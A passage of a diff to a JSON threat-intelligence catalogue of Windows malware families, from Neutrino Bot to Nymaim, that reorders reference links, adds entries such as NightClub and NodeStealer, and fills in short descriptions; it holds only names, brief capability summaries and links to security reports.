"http://blog.trendmicro.com/trendlabs-security-intelligence/credit-card-scraping-kasidet-builder-leads-to-spike-in-detections/", + "https://blog.malwarebytes.com/cybercrime/2017/01/post-holiday-spam-campaign-delivers-neutrino-bot/", + "http://www.peppermalware.com/2019/01/analysis-of-neutrino-bot-sample-2018-08-27.html", + "https://blog.malwarebytes.com/threat-analysis/2015/08/inside-neutrino-botnet-builder/" ], "synonyms": [ "Kasidet" @@ -35628,13 +37246,13 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.newcore_rat", - "https://nao-sec.org/2020/01/an-overhead-view-of-the-royal-road.html", - "https://securelist.com/cycldek-bridging-the-air-gap/97157/", - "https://blog.viettelcybersecurity.com/p1-chien-dich-cua-nhom-apt-trung-quoc-goblin-panda-tan-cong-vao-viet-nam-loi-dung-dai-dich-covid-19/", - "https://blog.fortinet.com/2017/09/05/rehashed-rat-used-in-apt-campaign-against-vietnamese-organizations", "https://drive.google.com/file/d/11otA_VmL061KcFC5MhDYuNdIKHYbpyrd/view", - "https://meltx0r.github.io/tech/2020/02/12/goblin-panda-apt.html", - "https://medium.com/@Sebdraven/goblin-panda-continues-to-target-vietnam-bc2f0f56dcd6" + "https://blog.viettelcybersecurity.com/p1-chien-dich-cua-nhom-apt-trung-quoc-goblin-panda-tan-cong-vao-viet-nam-loi-dung-dai-dich-covid-19/", + "https://securelist.com/cycldek-bridging-the-air-gap/97157/", + "https://blog.fortinet.com/2017/09/05/rehashed-rat-used-in-apt-campaign-against-vietnamese-organizations", + "https://nao-sec.org/2020/01/an-overhead-view-of-the-royal-road.html", + "https://medium.com/@Sebdraven/goblin-panda-continues-to-target-vietnam-bc2f0f56dcd6", + "https://meltx0r.github.io/tech/2020/02/12/goblin-panda-apt.html" ], "synonyms": [], "type": [] @@ -35660,9 +37278,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.newposthings", - "https://blog.trendmicro.com/trendlabs-security-intelligence/operation-black-atlas-endangers-in-store-card-payments-and-smbs-worldwide-switches-between-blackpos-and-other-tools/", + "https://blog.trendmicro.com/trendlabs-security-intelligence/newposthings-has-new-pos-things/", "https://www.fireeye.com/blog/threat-research/2016/04/multigrain_pointo.html", - "https://blog.trendmicro.com/trendlabs-security-intelligence/newposthings-has-new-pos-things/" + "https://blog.trendmicro.com/trendlabs-security-intelligence/operation-black-atlas-endangers-in-store-card-payments-and-smbs-worldwide-switches-between-blackpos-and-other-tools/" ], "synonyms": [], "type": [] @@ -35688,9 +37306,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.new_ct", + "https://www.secureworks.com/research/threat-profiles/bronze-express", "https://unit42.paloaltonetworks.com/atoms/shallowtaurus/", "http://csecybsec.com/download/zlab/20180713_CSE_APT28_X-Agent_Op-Roman%20Holiday-Report_v6_1.pdf", - "https://www.secureworks.com/research/threat-profiles/bronze-express", "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-operation-quantum-entanglement.pdf" ], "synonyms": [ @@ -35745,12 +37363,12 @@ "value": "Ngioweb (Windows)" }, { - "description": "", + "description": "According to Unit42, NGLite is a backdoor Trojan that is only capable of running commands received through its C2 channel. While the capabilities are standard for a backdoor, NGLite uses a novel C2 channel that leverages a decentralized network based on the legitimate NKN to communicate between the backdoor and the actors.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.nglite", - "https://unit42.paloaltonetworks.com/manageengine-godzilla-nglite-kdcsponge/", - "https://us-cert.cisa.gov/ncas/alerts/aa21-336a" + "https://us-cert.cisa.gov/ncas/alerts/aa21-336a", + "https://unit42.paloaltonetworks.com/manageengine-godzilla-nglite-kdcsponge/" ], "synonyms": [], "type": [] @@ -35771,16 +37389,30 @@ "uuid": "5a998606-a9a9-42ad-affb-9be37e11ec25", "value": "Nibiru" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.nightclub", + "https://i.blackhat.com/BH-US-23/Presentations/US-23-MatthieuFaou-MoustachedBouncer.pdf", + "https://www.welivesecurity.com/en/eset-research/moustachedbouncer-espionage-against-foreign-diplomats-in-belarus/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "7b9747fa-291a-497b-ae0a-b0760b2b62e5", + "value": "NightClub" + }, { "description": "C2 framework.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.nighthawk", "https://github.com/struppigel/hedgehog-tools/blob/main/nighthawk_str_decoder.py", - "https://michaelkoczwara.medium.com/hunting-c2-with-shodan-223ca250d06f", - "https://github.com/kevoreilly/CAPEv2/blob/master/modules/processing/parsers/CAPE/Nighthawk.py", "https://www.proofpoint.com/us/blog/threat-insight/nighthawk-and-coming-pentest-tool-likely-gain-threat-actor-notice", - "https://web.archive.org/web/20220505170100/https://suspicious.actor/2022/05/05/mdsec-nighthawk-study.html" + "https://web.archive.org/web/20220505170100/https://suspicious.actor/2022/05/05/mdsec-nighthawk-study.html", + "https://michaelkoczwara.medium.com/hunting-c2-with-shodan-223ca250d06f", + "https://github.com/kevoreilly/CAPEv2/blob/master/modules/processing/parsers/CAPE/Nighthawk.py" ], "synonyms": [], "type": [] @@ -35793,14 +37425,14 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.nightsky", - "https://www.secureworks.com/research/bronze-starlight-ransomware-operations-use-hui-loader", - "https://twitter.com/cglyer/status/1480742363991580674", "https://twitter.com/cglyer/status/1480734487000453121", - "https://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation", - "https://www.bleepingcomputer.com/news/security/night-sky-is-the-latest-ransomware-targeting-corporate-networks/", - "https://www.youtube.com/watch?v=Yzt_zOO8pDM", "https://www.cynet.com/attack-techniques-hands-on/threats-looming-over-the-horizon/", - "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself" + "https://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation", + "https://www.secureworks.com/research/bronze-starlight-ransomware-operations-use-hui-loader", + "https://www.youtube.com/watch?v=Yzt_zOO8pDM", + "https://www.bleepingcomputer.com/news/security/night-sky-is-the-latest-ransomware-targeting-corporate-networks/", + "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself", + "https://twitter.com/cglyer/status/1480742363991580674" ], "synonyms": [ "Night Sky" @@ -35825,7 +37457,7 @@ "value": "NimbleMamba " }, { - "description": "According to the author, Nimbo-C2 is yet another (simple and lightweight) C2 framework. The agent currently supports Windows x64 only. It's written in Nim, with some usage of .NET (by dynamically loading the CLR to the process).", + "description": "According to the author, Nimbo-C2 is yet another (simple and lightweight) C2 framework. The agent currently supports Windows x64 and Linux. It's written in Nim, with some usage of .NET (by dynamically loading the CLR to the process).", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.nimbo_c2", @@ -35835,7 +37467,7 @@ "type": [] }, "uuid": "bda7efa0-e08d-453e-95d4-9307c5104a69", - "value": "Nimbo-C2" + "value": "Nimbo-C2 (Windows)" }, { "description": "Malware written in Nim, stealing data including discord tokens from browsers, exfiltrating the results via a Discord webhook.", @@ -35863,6 +37495,32 @@ "uuid": "69981781-962a-409a-93c6-cb5377257de8", "value": "Nimrev" }, + { + "description": "According to its author, NimBlackout is an adaptation of the @Blackout project originally developed in C++ by @ZeroMemoryEx, which consists of removing AV/EDRs using the gmer (BYOVD) driver. The main reason for this project was to understand how BYOVD attacks work, and then to provide a valid PoC developed in Nim.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.nim_blackout", + "https://github.com/Helixo32/NimBlackout" + ], + "synonyms": [], + "type": [] + }, + "uuid": "904152c4-7483-41e7-acbb-884a7b32bce4", + "value": "NimBlackout" + }, + { + "description": "NirCmd is a benign tool by NirSoft that provides various functionalities. Among these is e.g. a capability to start regedit as SYSTEM, which is sometimes abused for privilege escalation, or other functionality abusable for other malicious purposes. It is also frequently flagged by AV engines.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.nircmd", + "https://www.nirsoft.net/utils/nircmd.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "51047f06-d824-4b84-a69c-97808b18f6bf", + "value": "NirCmd" + }, { "description": "", "meta": { @@ -35881,10 +37539,10 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.nitol", - "https://en.wikipedia.org/wiki/Nitol_botnet", - "https://krebsonsecurity.com/tag/nitol/", "https://asec.ahnlab.com/en/44504/", - "https://blogs.technet.microsoft.com/microsoft_blog/2012/09/13/microsoft-disrupts-the-emerging-nitol-botnet-being-spread-through-an-unsecure-supply-chain/" + "https://krebsonsecurity.com/tag/nitol/", + "https://blogs.technet.microsoft.com/microsoft_blog/2012/09/13/microsoft-disrupts-the-emerging-nitol-botnet-being-spread-through-an-unsecure-supply-chain/", + "https://en.wikipedia.org/wiki/Nitol_botnet" ], "synonyms": [], "type": [] @@ -35898,9 +37556,9 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.nitro", "https://documents.trendmicro.com/assets/wp/wp-detecting-apt-activity-with-network-traffic-analysis.pdf", + "https://twitter.com/malwrhunterteam/status/1430616882231578624", "https://github.com/nightfallgt/nitro-ransomware", - "https://www.bleepingcomputer.com/news/security/discord-nitro-gift-codes-now-demanded-as-ransomware-payments/", - "https://twitter.com/malwrhunterteam/status/1430616882231578624" + "https://www.bleepingcomputer.com/news/security/discord-nitro-gift-codes-now-demanded-as-ransomware-payments/" ], "synonyms": [ "Hydra" @@ -35908,7 +37566,7 @@ "type": [] }, "uuid": "a81635fc-7bb7-4cd1-b26c-ea8ce6cb2763", - "value": "win.nitro" + "value": "Nitro" }, { "description": "A Turkish cryptominer campaign.", @@ -35941,74 +37599,75 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.njrat", - "https://attack.mitre.org/groups/G0096", - "https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/", - "https://securityintelligence.com/posts/roboski-global-recovery-automation/", - "https://info.spamhaus.com/hubfs/Botnet%20Reports/2022%20Q3%20Botnet%20Threat%20Update.pdf", - "https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/591/original/062521_SideCopy_%281%29.pdf", - "https://mp.weixin.qq.com/s/gWOIRNPLVqX761LW8x-S5g", - "https://twitter.com/ESETresearch/status/1449132020613922828", - "https://www.trendmicro.com/en_us/research/21/i/apt-c-36-updates-its-long-term-spam-campaign-against-south-ameri.html", - "https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html", - "https://blogs.360.cn/post/APT-C-44.html", - "https://blog.sonatype.com/bladabindi-njrat-rat-in-jdb.js-npm-malware", - "https://intel471.com/blog/privateloader-malware", - "https://www.bleepingcomputer.com/news/security/fake-microsoft-teams-updates-lead-to-cobalt-strike-deployment/", - "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf", - "http://threatgeek.typepad.com/files/fta-1009---njrat-uncovered-1.pdf", - "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf", - "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf", - "https://blog.talosintelligence.com/2021/08/rat-campaign-targets-latin-america.html", - "https://blog.reversinglabs.com/blog/rats-in-the-library", - "https://blog.fortinet.com/2016/11/30/bladabindi-remains-a-constant-threat-by-using-dynamic-dns-services", - "https://forensicitguy.github.io/njrat-installed-from-msi/", - "https://ti.360.net/blog/articles/analysis-of-apt-c-27/", - "https://labs.k7computing.com/?p=21904", - "https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/", - "https://unit42.paloaltonetworks.com/njrat-pastebin-command-and-control", - "https://www.proofpoint.com/us/blog/threat-insight/reservations-requested-ta558-targets-hospitality-and-travel", - "https://www.proofpoint.com/us/threat-insight/post/new-whiteshadow-downloader-uses-microsoft-sql-retrieve-malware", - "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/apt-c-36-updates-its-long-term-spam-campaign-against-south-american-entities-with-commodity-rats/BlindEagleIOCList.txt", - "https://malwr-analysis.com/2020/06/21/njrat-malware-analysis/", - "https://www.ciphertechsolutions.com/roboski-global-recovery-automation/", - "https://www.secureworks.com/research/threat-profiles/copper-fieldstone", - "https://github.com/threatland/TL-TROJAN/tree/master/TL.RAT/RAT.Win.njRAT", - "https://www.seqrite.com/documents/en/white-papers/Whitepaper-OperationSideCopy.pdf", - "https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/592/original/Hashes_IOCs_for_coverage.txt", - "https://blog.morphisec.com/syk-crypter-discord", - "https://about.fb.com/news/2021/04/taking-action-against-hackers-in-palestine/", - "https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/594/original/Network_IOCs_list_for_coverage.txt?1625657479", - "https://www.zscaler.com/blogs/security-research/catching-rats-over-custom-protocols", - "http://blog.trendmicro.com/trendlabs-security-intelligence/new-rats-emerge-from-leaked-njw0rm-source-code/", - "https://lab52.io/blog/very-very-lazy-lazyscripters-scripts-double-compromise-in-a-single-obfuscation/", - "https://ics-cert.kaspersky.com/media/Kaspersky-ICS-CERT-APT-attacks-on-industrial-organizations-in-H1-2021-En.pdf", - "https://www.4hou.com/posts/VoPM", - "https://blog.nviso.eu/2020/09/01/epic-manchego-atypical-maldoc-delivery-brings-flurry-of-infostealers/", - "https://www.vectra.ai/blogpost/moonlight-middle-east-targeted-attacks", - "https://www.menlosecurity.com/blog/isomorph-infection-in-depth-analysis-of-a-new-html-smuggling-campaign/", - "https://github.com/itsKindred/malware-analysis-writeups/blob/master/bashar-bachir-chain/bashar-bachir-analysis.pdf", - "https://di.sclosu.re/en/njrat-malware-spreading-through-discord-cdn-and-facebook-ads/", - "http://blogs.360.cn/post/analysis-of-apt-c-37.html", - "https://cybergeeks.tech/just-another-analysis-of-the-njrat-malware-a-step-by-step-approach/", - "https://securelist.com/apt-trends-report-q2-2019/91897/", - "https://intel471.com/blog/china-cybercrime-undergrond-deepmix-tea-horse-road-great-firewall/", - "https://www.welivesecurity.com/2021/01/12/operation-spalax-targeted-malware-attacks-colombia/", - "https://www.trendmicro.com/en_us/research/21/k/campaign-abusing-rats-uses-fake-websites.html", - "https://asec.ahnlab.com/1369", - "https://www.microsoft.com/security/blog/2021/11/11/html-smuggling-surges-highly-evasive-loader-technique-increasingly-used-in-banking-malware-targeted-attacks/", - "https://mp.weixin.qq.com/s/mstwBMkS0G3Et4GOji2mwA", - "https://blogs.blackberry.com/en/2022/05/dirty-deeds-done-dirt-cheap-russian-rat-offers-backdoor-bargains", - "https://news.sophos.com/en-us/2020/05/14/raticate/", "https://pylos.co/wp-content/uploads/2020/02/Threat-Intelligence-and-the-Limits-of-Malware-Analysis.pdf", - "https://cyberandramen.net/2022/01/12/analysis-of-njrat-powerpoint-macros/", "https://www.trendmicro.com/en_us/research/23/a/earth-bogle-campaigns-target-middle-east-with-geopolitical-lures.html", + "https://github.com/threatland/TL-TROJAN/tree/master/TL.RAT/RAT.Win.njRAT", + "https://blogs.blackberry.com/en/2022/05/dirty-deeds-done-dirt-cheap-russian-rat-offers-backdoor-bargains", + "https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/", + "https://www.welivesecurity.com/2021/01/12/operation-spalax-targeted-malware-attacks-colombia/", + "http://blogs.360.cn/post/analysis-of-apt-c-37.html", + "https://lab52.io/blog/very-very-lazy-lazyscripters-scripts-double-compromise-in-a-single-obfuscation/", "https://www.trendmicro.com/en_us/research/20/i/wind-up-windscribe-vpn-bundled-with-backdoor.html", - "https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q1%20Botnet%20Threat%20Update.pdf", - "https://www.trendmicro.com/en_us/research/21/i/Water-Basilisk-Uses-New-HCrypt-Variant-to-Flood-Victims-with-RAT-Payloads.html", - "https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/591/original/062521_SideCopy_%281%29.pdf?1625657388", - "https://www.intezer.com/wp-content/uploads/2021/02/Intezer-2020-Go-Malware-Round-Up.pdf", + "https://unit42.paloaltonetworks.com/njrat-pastebin-command-and-control", + "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf", + "https://www.trendmicro.com/en_us/research/21/k/campaign-abusing-rats-uses-fake-websites.html", + "https://malwr-analysis.com/2020/06/21/njrat-malware-analysis/", + "https://blog.talosintelligence.com/2021/09/operation-layover-how-we-tracked-attack.html", + "https://blogs.360.cn/post/APT-C-44.html", + "https://www.vectra.ai/blogpost/moonlight-middle-east-targeted-attacks", + "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf", + "https://www.proofpoint.com/us/blog/threat-insight/reservations-requested-ta558-targets-hospitality-and-travel", + "https://info.spamhaus.com/hubfs/Botnet%20Reports/2022%20Q3%20Botnet%20Threat%20Update.pdf", + "https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/594/original/Network_IOCs_list_for_coverage.txt?1625657479", + "https://asec.ahnlab.com/1369", + "https://www.zscaler.com/blogs/security-research/catching-rats-over-custom-protocols", + "https://forensicitguy.github.io/njrat-installed-from-msi/", + "http://blog.trendmicro.com/trendlabs-security-intelligence/new-rats-emerge-from-leaked-njw0rm-source-code/", + "https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html", + "https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/", + "https://blog.sonatype.com/bladabindi-njrat-rat-in-jdb.js-npm-malware", "https://blog.talosintelligence.com/2021/07/sidecopy.html", - "https://blog.talosintelligence.com/2021/09/operation-layover-how-we-tracked-attack.html" + "https://intel471.com/blog/privateloader-malware", + "https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/591/original/062521_SideCopy_%281%29.pdf?1625657388", + "https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/592/original/Hashes_IOCs_for_coverage.txt", + "https://attack.mitre.org/groups/G0096", + "https://securityintelligence.com/posts/roboski-global-recovery-automation/", + "https://www.menlosecurity.com/blog/isomorph-infection-in-depth-analysis-of-a-new-html-smuggling-campaign/", + "https://blog.fortinet.com/2016/11/30/bladabindi-remains-a-constant-threat-by-using-dynamic-dns-services", + "https://www.proofpoint.com/us/threat-insight/post/new-whiteshadow-downloader-uses-microsoft-sql-retrieve-malware", + "https://ics-cert.kaspersky.com/media/Kaspersky-ICS-CERT-APT-attacks-on-industrial-organizations-in-H1-2021-En.pdf", + "https://about.fb.com/news/2021/04/taking-action-against-hackers-in-palestine/", + "https://blog.reversinglabs.com/blog/rats-in-the-library", + "https://blog.morphisec.com/syk-crypter-discord", + "https://www.microsoft.com/security/blog/2021/11/11/html-smuggling-surges-highly-evasive-loader-technique-increasingly-used-in-banking-malware-targeted-attacks/", + "https://labs.k7computing.com/?p=21904", + "https://www.trendmicro.com/en_us/research/21/i/apt-c-36-updates-its-long-term-spam-campaign-against-south-ameri.html", + "https://blog.talosintelligence.com/2021/08/rat-campaign-targets-latin-america.html", + "https://securelist.com/apt-trends-report-q2-2019/91897/", + "https://cyberandramen.net/2022/01/12/analysis-of-njrat-powerpoint-macros/", + "https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/591/original/062521_SideCopy_%281%29.pdf", + "https://mp.weixin.qq.com/s/mstwBMkS0G3Et4GOji2mwA", + "https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q2%20Botnet%20Threat%20Update.pdf", + "https://github.com/itsKindred/malware-analysis-writeups/blob/master/bashar-bachir-chain/bashar-bachir-analysis.pdf", + "https://cybergeeks.tech/just-another-analysis-of-the-njrat-malware-a-step-by-step-approach/", + "https://ti.360.net/blog/articles/analysis-of-apt-c-27/", + "https://www.ciphertechsolutions.com/roboski-global-recovery-automation/", + "https://www.seqrite.com/documents/en/white-papers/Whitepaper-OperationSideCopy.pdf", + "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf", + "https://twitter.com/ESETresearch/status/1449132020613922828", + "https://blog.nviso.eu/2020/09/01/epic-manchego-atypical-maldoc-delivery-brings-flurry-of-infostealers/", + "https://news.sophos.com/en-us/2020/05/14/raticate/", + "https://www.trendmicro.com/en_us/research/21/i/Water-Basilisk-Uses-New-HCrypt-Variant-to-Flood-Victims-with-RAT-Payloads.html", + "https://mp.weixin.qq.com/s/gWOIRNPLVqX761LW8x-S5g", + "https://www.bleepingcomputer.com/news/security/fake-microsoft-teams-updates-lead-to-cobalt-strike-deployment/", + "https://www.intezer.com/wp-content/uploads/2021/02/Intezer-2020-Go-Malware-Round-Up.pdf", + "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/apt-c-36-updates-its-long-term-spam-campaign-against-south-american-entities-with-commodity-rats/BlindEagleIOCList.txt", + "https://intel471.com/blog/china-cybercrime-undergrond-deepmix-tea-horse-road-great-firewall/", + "https://www.secureworks.com/research/threat-profiles/copper-fieldstone", + "http://threatgeek.typepad.com/files/fta-1009---njrat-uncovered-1.pdf", + "https://di.sclosu.re/en/njrat-malware-spreading-through-discord-cdn-and-facebook-ads/", + "https://www.4hou.com/posts/VoPM", + "https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q1%20Botnet%20Threat%20Update.pdf" ], "synonyms": [ "Bladabindi", @@ -36045,14 +37704,27 @@ "uuid": "94793dbc-3649-40a4-9ccc-1b32846ecb3a", "value": "Nocturnal Stealer" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.node_stealer", + "https://unit42.paloaltonetworks.com/nodestealer-2-targets-facebook-business/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "e7890226-7e39-4902-bbce-e384e0847303", + "value": "NodeStealer" + }, { "description": "Nokki is a RAT type malware which is believe to evolve from Konni RAT. This malware has been tied to attacks containing politically-motivated lures targeting Russian and Cambodian speaking individuals or organizations. Researchers discovered a tie to the threat actor group known as Reaper also known as APT37.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.nokki", + "https://researchcenter.paloaltonetworks.com/2018/10/unit42-nokki-almost-ties-the-knot-with-dogcall-reaper-group-uses-new-malware-to-deploy-rat/", "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", - "https://researchcenter.paloaltonetworks.com/2018/10/unit42-nokki-almost-ties-the-knot-with-dogcall-reaper-group-uses-new-malware-to-deploy-rat/", "https://researchcenter.paloaltonetworks.com/2018/09/unit42-new-konni-malware-attacking-eurasia-southeast-asia/" ], "synonyms": [], @@ -36066,11 +37738,14 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.nokoyawa", - "https://www.zscaler.com/blogs/security-research/nevada-ransomware-yet-another-nokayawa-variant", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2023-CTI-007.pdf", "https://www.sentinelone.com/labs/nokoyawa-ransomware-new-karma-nemty-variant-wears-thin-disguise/", - "https://www.zscaler.com/blogs/security-research/nokoyawa-ransomware-rust-or-bust", - "https://malgamy.github.io/malware-analysis/Nokoyawa/", "https://www.trendmicro.com/en_us/research/22/c/nokoyawa-ransomware-possibly-related-to-hive-.html", + "https://thedfirreport.com/2023/08/28/html-smuggling-leads-to-domain-wide-ransomware/", + "https://www.zscaler.com/blogs/security-research/nokoyawa-ransomware-rust-or-bust", + "https://thedfirreport.com/2023/05/22/icedid-macro-ends-in-nokoyawa-ransomware/", + "https://www.zscaler.com/blogs/security-research/nevada-ransomware-yet-another-nokayawa-variant", + "https://malgamy.github.io/malware-analysis/Nokoyawa/", "https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE54L7v", "https://github.com/MalGamy/YARA_Rules/blob/main/Nokoyawa.yara" ], @@ -36085,8 +37760,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.nominatus_toxic_battery", - "https://twitter.com/struppigel/status/1501473254787198977", - "https://www.trellix.com/en-us/about/newsroom/stories/research/wipermania-an-all-you-can-wipe-buffet.html" + "https://www.trellix.com/en-us/about/newsroom/stories/research/wipermania-an-all-you-can-wipe-buffet.html", + "https://twitter.com/struppigel/status/1501473254787198977" ], "synonyms": [], "type": [] @@ -36094,6 +37769,19 @@ "uuid": "2fef9561-e16f-47a9-90c6-a68a1b20cc95", "value": "NominatusToxicBattery" }, + { + "description": "Ransomware", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.nopyfy", + "https://labs.k7computing.com/index.php/say-no-to-nopyfy/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "62fe621a-04aa-4b5d-95d7-c1c3e4bcd17c", + "value": "Nopyfy" + }, { "description": "An open source C2 framework intended for pentest and red teaming activities.", "meta": { @@ -36108,7 +37796,7 @@ "value": "NorthStar" }, { - "description": "", + "description": "According to PCrisk, Nosu is the name of a malicious program classified as a stealer. This malware is designed to steal information from infected machines. The Nosu stealer can extract a wide variety of data from devices and installed applications. The most active campaigns associated with Nosu were noted in North and South America, as well as Southeast Asia.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.nosu", @@ -36152,8 +37840,8 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.nransom", "https://www.kaspersky.com/blog/nransom-nude-ransomware/18597/", - "https://motherboard.vice.com/en_us/article/yw3w47/this-ransomware-demands-nudes-instead-of-bitcoin", - "https://twitter.com/malwrhunterteam/status/910952333084971008" + "https://twitter.com/malwrhunterteam/status/910952333084971008", + "https://motherboard.vice.com/en_us/article/yw3w47/this-ransomware-demands-nudes-instead-of-bitcoin" ], "synonyms": [], "type": [] @@ -36180,11 +37868,11 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.nullmixer", - "https://www.youtube.com/watch?v=v_K_zoPGpdk", "https://www.youtube.com/watch?v=yLQfDk3dVmA", - "https://securelist.com/nullmixer-oodles-of-trojans-in-a-single-dropper/107498/", + "https://www.youtube.com/watch?v=v_K_zoPGpdk", "https://medium.com/@lcam/updates-from-the-maas-new-threats-delivered-through-nullmixer-d45defc260d1", - "https://www.youtube.com/watch?v=92jKJ_G_6ho" + "https://www.youtube.com/watch?v=92jKJ_G_6ho", + "https://securelist.com/nullmixer-oodles-of-trojans-in-a-single-dropper/107498/" ], "synonyms": [], "type": [] @@ -36193,12 +37881,12 @@ "value": "Nullmixer" }, { - "description": "", + "description": "According to PCrisk, Numando is a banking trojan written in the Delphi programming language. As the malicious program's classification implies, it is designed to steal banking information. Numando primarily targets Brazil, with seldom campaigns occurring in Mexico and Spain.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.numando", - "https://www.welivesecurity.com/2020/10/01/latam-financial-cybercrime-competitors-crime-sharing-ttps/", - "https://www.welivesecurity.com/2021/09/17/numando-latam-banking-trojan/" + "https://www.welivesecurity.com/2021/09/17/numando-latam-banking-trojan/", + "https://www.welivesecurity.com/2020/10/01/latam-financial-cybercrime-competitors-crime-sharing-ttps/" ], "synonyms": [], "type": [] @@ -36211,9 +37899,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.nvisospit", - "http://www.isg.rhul.ac.uk/dl/weekendconference2014/slides/Erik_VanBuggenhout.pdf", + "https://twitter.com/Bank_Security/status/1134850646413385728", "https://twitter.com/r3c0nst/status/1135606944427905025", - "https://twitter.com/Bank_Security/status/1134850646413385728" + "http://www.isg.rhul.ac.uk/dl/weekendconference2014/slides/Erik_VanBuggenhout.pdf" ], "synonyms": [], "type": [] @@ -36226,9 +37914,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.nworm", + "https://bazaar.abuse.ch/browse/tag/N-W0rm/", "https://www.secuinfra.com/en/techtalk/n-w0rm-analysis-part-2/", - "https://www.secuinfra.com/en/techtalk/n-w0rm-analysis-part-1/", - "https://bazaar.abuse.ch/browse/tag/N-W0rm/" + "https://www.secuinfra.com/en/techtalk/n-w0rm-analysis-part-1/" ], "synonyms": [ "NWorm", @@ -36244,22 +37932,23 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.nymaim", - "https://blog.talosintelligence.com/goznym/", - "https://securityintelligence.com/posts/goznym-closure-comes-in-the-shape-of-a-europol-and-doj-arrest-operation/", "https://www.sentinelone.com/blog/goznym-banking-malware-gang-busted/", - "https://www.cert.pl/en/news/single/nymaim-revisited/", - "https://www.shadowserver.org/news/goznym-indictments-action-following-on-from-successful-avalanche-operations/", "https://public.gdatasoftware.com/Web/Landingpages/DE/GI-Spring2014/slides/004_plohmann.pdf", - "https://www.proofpoint.com/us/what-old-new-again-nymaim-moves-past-its-ransomware-roots-0", - "https://github.com/coldshell/Malware-Scripts/tree/master/Nymaim", - "https://arielkoren.com/blog/2016/11/02/nymaim-deep-technical-dive-adventures-in-evasive-malware/", - "https://securityintelligence.com/meet-goznym-the-banking-malware-offspring-of-gozi-isfb-and-nymaim/", + 